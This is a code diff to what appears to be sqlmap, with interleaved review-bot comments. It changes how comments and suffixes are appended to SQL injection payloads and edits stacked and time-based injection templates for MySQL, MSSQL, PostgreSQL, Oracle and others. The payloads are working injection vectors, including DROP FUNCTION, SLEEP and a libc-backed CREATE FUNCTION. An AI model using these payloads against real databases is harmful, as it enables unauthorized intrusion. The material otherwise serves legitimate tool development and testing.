diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 0f0bec8f0..e61714b79 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -500,7 +500,7 @@ def checkSqlInjection(place, parameter, value):
                         injection.os = Backend.setOs(dValue)
 
                     if vector is None and "vector" in test and test.vector is not None:
-                        vector = "%s%s" % (test.vector, comment or "")
+                        vector = test.vector
 
                     injection.data[stype] = AttribDict()
                     injection.data[stype].title = title
diff --git a/lib/controller/controller.py b/lib/controller/controller.py
index 73ec08260..e2b297822 100644
--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -128,12 +128,15 @@ def __formatInjection(inj):
     for stype, sdata in inj.data.items():
         title = sdata.title
         vector = sdata.vector
+        comment = sdata.comment
         if stype == PAYLOAD.TECHNIQUE.UNION:
             count = re.sub(r"(?i)(\(.+\))|(\blimit[^A-Za-z]+)", "", sdata.payload).count(',') + 1
             title = re.sub(r"\d+ to \d+", str(count), title)
             vector = agent.forgeInbandQuery("[QUERY]", vector[0], vector[1], vector[2], None, None, vector[5], vector[6])
             if count == 1:
                 title = title.replace("columns", "column")
+        elif comment:
+            vector = "%s%s" % (vector, comment)
         data += " Type: %s\n" % PAYLOAD.SQLINJECTION[stype]
         data += " Title: %s\n" % title
         data += " Payload: %s\n" % agent.adjustLateValues(sdata.payload)
diff --git a/lib/core/agent.py b/lib/core/agent.py
index 9f1ff26f4..d4367c985 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
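Review bot: Dropping the comment from the stored vector only works if the comment is saved alongside it, and this hunk does not show `injection.data[stype].comment = comment` being set — it assigns `.title` and the rest of the record is outside the hunk. `__formatInjection` in controller.py now reads `sdata.comment` and `Agent.suffixQuery` reads `kb.injection.data[kb.technique].comment`, so a missing attribute would surface there rather than here. If the assignment is not made further down, add `injection.data[stype].comment = comment` next to the `.title` line. The enclosing `checkSqlInjection` body starts and ends outside the hunk.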
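Review bot: The new `elif comment:` hangs off `if stype == PAYLOAD.TECHNIQUE.UNION`, so a reader may take it to mean the comment is deliberately left off UNION vectors; the intent is presumably that `forgeInbandQuery` already receives the comment through the vector tuple, but nothing in the hunk says so. A one-line comment above the branch would keep the next reader from "fixing" it, e.g. `# UNION vectors are rebuilt by forgeInbandQuery from the vector tuple; every other technique gets its comment appended verbatim, mirroring agent.suffixQuery`. `__formatInjection` continues outside the hunk.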
@@ -189,8 +189,12 @@ class Agent:
         expression = self.cleanupPayload(expression)
 
-        # User supplied --suffix nullifies any eventual payload comments
-        comment = None if conf.suffix is not None and suffix == conf.suffix else comment
+        # Take default values if None
+        suffix = kb.injection.suffix if kb.injection and suffix is None else suffix
+
+        if kb.technique and kb.technique in kb.injection.data:
+            where = kb.injection.data[kb.technique].where if where is None else where
+            comment = kb.injection.data[kb.technique].comment if comment is None else comment
 
         if Backend.getIdentifiedDbms() == DBMS.ACCESS and comment == GENERIC_SQL_COMMENT:
             comment = "%00"
@@ -198,16 +202,13 @@ class Agent:
         if comment is not None:
             expression += comment
 
-        if where is None and kb.technique and kb.technique in kb.injection.data:
-            where = kb.injection.data[kb.technique].where
-
         # If we are replacing () the parameter original value with
         # our payload do not append the suffix
         if where == PAYLOAD.WHERE.REPLACE:
             pass
-        elif any([kb.injection.suffix, suffix]) and not (comment and not conf.suffix):
-            expression += " %s" % (kb.injection.suffix or suffix)
+        elif suffix and not comment:
+            expression += " %s" % suffix
 
         return re.sub(r"(?s);\W*;", ";", expression)
diff --git a/lib/request/inject.py b/lib/request/inject.py
index 4eb0e86d1..03830e8b5 100644
--- a/lib/request/inject.py
+++ b/lib/request/inject.py
@@ -466,9 +466,8 @@ def goStacked(expression, silent=False):
     if conf.direct:
         return direct(expression)
 
-    comment = queries[Backend.getIdentifiedDbms()].comment.query
     query = agent.prefixQuery(";%s" % expression)
-    query = agent.suffixQuery(query, comment)
+    query = agent.suffixQuery(query)
     payload = agent.payload(newValue=query)
 
     Request.queryPage(payload, content=False, silent=silent, noteResponseTime=False, timeBasedCompare=True)
diff --git a/lib/techniques/dns/use.py b/lib/techniques/dns/use.py
index 351ffc8c6..150e40aa8 100644
--- a/lib/techniques/dns/use.py
+++ b/lib/techniques/dns/use.py
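Review bot: The `kb.injection` guard that protects the suffix default on the first added line is missing from the `if` directly below it, so `kb.technique in kb.injection.data` dereferences `kb.injection` unguarded; if `kb.injection` can be None here — which the first line's own guard suggests — this raises AttributeError whenever a technique is set. Make the two conditions agree: `if kb.injection and kb.technique and kb.technique in kb.injection.data:`. The same unguarded form existed in the removed `where` lookup, so this may be long-standing, but the new line is now the single place that defaults both `where` and `comment`. `suffixQuery`'s signature and docstring are outside the hunk.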
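Review bot: `elif suffix and not comment:` silently drops a user-supplied `--suffix` whenever the technique's payload carries a comment, because the comment is now defaulted from `kb.injection.data[...]` and the removed rule that nullified it for `conf.suffix` (previous hunk) has no replacement. Before this change `--suffix` won over the payload comment; now the comment wins and the suffix never reaches the request, unless detection already stores a None comment when `--suffix` is given, which is not visible here. If `--suffix` is meant to override, restore the rule before the comment is appended: `if conf.suffix is not None and suffix == conf.suffix: comment = None`. `suffixQuery` starts outside the hunk.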
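Review bot: `goStacked` no longer chooses the comment itself; `agent.suffixQuery(query)` now takes `comment` and `where` from `kb.injection.data[kb.technique]`, i.e. from whichever technique happens to be active. A stacked statement is issued here regardless of which technique detected the injection, so if `kb.technique` is at that moment, say, the boolean-based entry, its comment — and a `where` of `PAYLOAD.WHERE.REPLACE`, which suppresses the suffix entirely — is applied to the stacked query; nothing in the hunk switches `kb.technique` to the stacked technique first. Either set `kb.technique` for the duration of the call or keep passing the comment explicitly, `agent.suffixQuery(query, comment)` with `comment` read from the stacked entry of `kb.injection.data`. The function continues outside the hunk.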
@@ -71,9 +71,8 @@ def dnsUse(payload, expression):
         expressionUnescaped = unescaper.unescape(expressionRequest)
 
         if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL):
-            comment = queries[Backend.getIdentifiedDbms()].comment.query
             query = agent.prefixQuery("; %s" % expressionUnescaped)
-            query = agent.suffixQuery(query, comment)
+            query = agent.suffixQuery(query)
             forgedPayload = agent.payload(newValue=query)
         else:
             forgedPayload = safeStringFormat(payload, (expressionUnescaped, randomInt(1), randomInt(3)))
diff --git a/xml/payloads.xml b/xml/payloads.xml
index 1288e6a4e..319d73996 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -1072,13 +1072,13 @@ Formats: 0 0 1 - ; IF(([INFERENCE]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]); + ; IF(([INFERENCE]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]) - ; IF(([RANDNUM]=[RANDNUM]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]); + ; IF(([RANDNUM]=[RANDNUM]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]) # - ; IF(([RANDNUM]=[RANDNUM1]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]); + ; IF(([RANDNUM]=[RANDNUM1]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR])
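Review bot: Same coupling as in `goStacked`: for MSSQL/PostgreSQL `dnsUse` now relies on `suffixQuery` to pick the comment from `kb.injection.data[kb.technique]`, yet DNS exfiltration grafts a stacked statement onto whatever technique is currently active, so that technique's comment and `where` — not the stacked entry's — end up terminating the injected query. If `kb.technique` is not the stacked technique at this point, the removed explicit `queries[...].comment.query` was the safer choice; at minimum pass the stacked entry's comment through the second argument, `agent.suffixQuery(query, comment)`. `dnsUse` continues outside the hunk.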
MySQL @@ -1092,13 +1092,13 @@ Formats: 0 0 1 - ; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]; + ; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] - ; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]; + ; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] -- - ; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]; + ; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]
Microsoft SQL Server @@ -1114,13 +1114,13 @@ Formats: 0 0 2 - ; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END); + ; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) - ; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END); + ; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) -- - ; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END); + ; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)
PostgreSQL @@ -1969,9 +1969,9 @@ Formats: 0 0 1 - ; IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]); + ; IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) - ; SELECT SLEEP([SLEEPTIME]); + ; SELECT SLEEP([SLEEPTIME]) -- @@ -1990,9 +1990,9 @@ Formats: 2 0 1 - ; IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]); + ; IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) - ; SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')); + ; SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) -- @@ -2010,9 +2010,9 @@ Formats: 0 0 1 - ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END); + ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) - ; SELECT PG_SLEEP([SLEEPTIME]); + ; SELECT PG_SLEEP([SLEEPTIME]) -- @@ -2031,9 +2031,9 @@ Formats: 2 0 1 - ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END); + ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) - ; SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000); + ; SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000) -- @@ -2051,9 +2051,9 @@ Formats: 0 0 1 - ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END); + ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) - ; CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME]); + ; CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME]) -- @@ -2073,9 +2073,9 @@ Formats: 0 0 1 - ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'; + ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' - ; WAITFOR DELAY '0:0:[SLEEPTIME]'; + ; WAITFOR DELAY '0:0:[SLEEPTIME]' -- 
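Review bot: With the trailing `;` removed from `; SELECT SLEEP([SLEEPTIME])` and the BENCHMARK payload, the statement is now terminated solely by the `<comment>` that `suffixQuery` appends, and MySQL only treats `--` as a comment when it is followed by whitespace. The rendered hunk shows `--` with no visible trailing space; if the element really is `--` rather than `-- `, `SLEEP(5)--` is a syntax error and the time-based test silently never fires. Confirm the comment element carries a trailing space, or keep one inside the payload. The `#`-commented MySQL tests earlier in the file are unaffected.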
@@ -2095,9 +2095,9 @@ Formats: 0 0 1 - ; SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL; + ; SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL - ; SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL; + ; SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL -- @@ -2115,9 +2115,9 @@ Formats: 2 0 1 - ; SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL; + ; SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL - ; SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5; + ; SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5 -- @@ -2135,9 +2135,9 @@ Formats: 0 0 1 - ; BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END; + ; BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END - ; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END; + ; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END -- @@ -2155,9 +2155,9 @@ Formats: 0 0 1 - ; BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END; + ; BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END - ; BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END; + ; BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END -- 
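Review bot: Removing the final `;` from `; BEGIN ... END;` in the DBMS_LOCK.SLEEP and USER_LOCK.SLEEP payloads leaves the PL/SQL anonymous block without its terminator; unlike a plain SQL statement, a block must end in `END;`, so once the `--` comment is appended the server sees `END -- ` and rejects the block. Keep `END;` in both the `<vector>` and `<payload>` of these two tests, e.g. `; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END;`, and let the comment follow it. The DBMS_PIPE and ALL_USERS tests in the same line are plain SELECTs and are fine without the semicolon.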
@@ -2175,9 +2175,9 @@ Formats: 2 0 1 - ; SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END); + ; SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END) - ; SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000)))); + ; SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000)))) -- @@ -2196,9 +2196,9 @@ Formats: 2 0 1 - ; SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3),[RANDNUM]) FROM RDB$DATABASE; + ; SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3),[RANDNUM]) FROM RDB$DATABASE - ; SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3; + ; SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3 --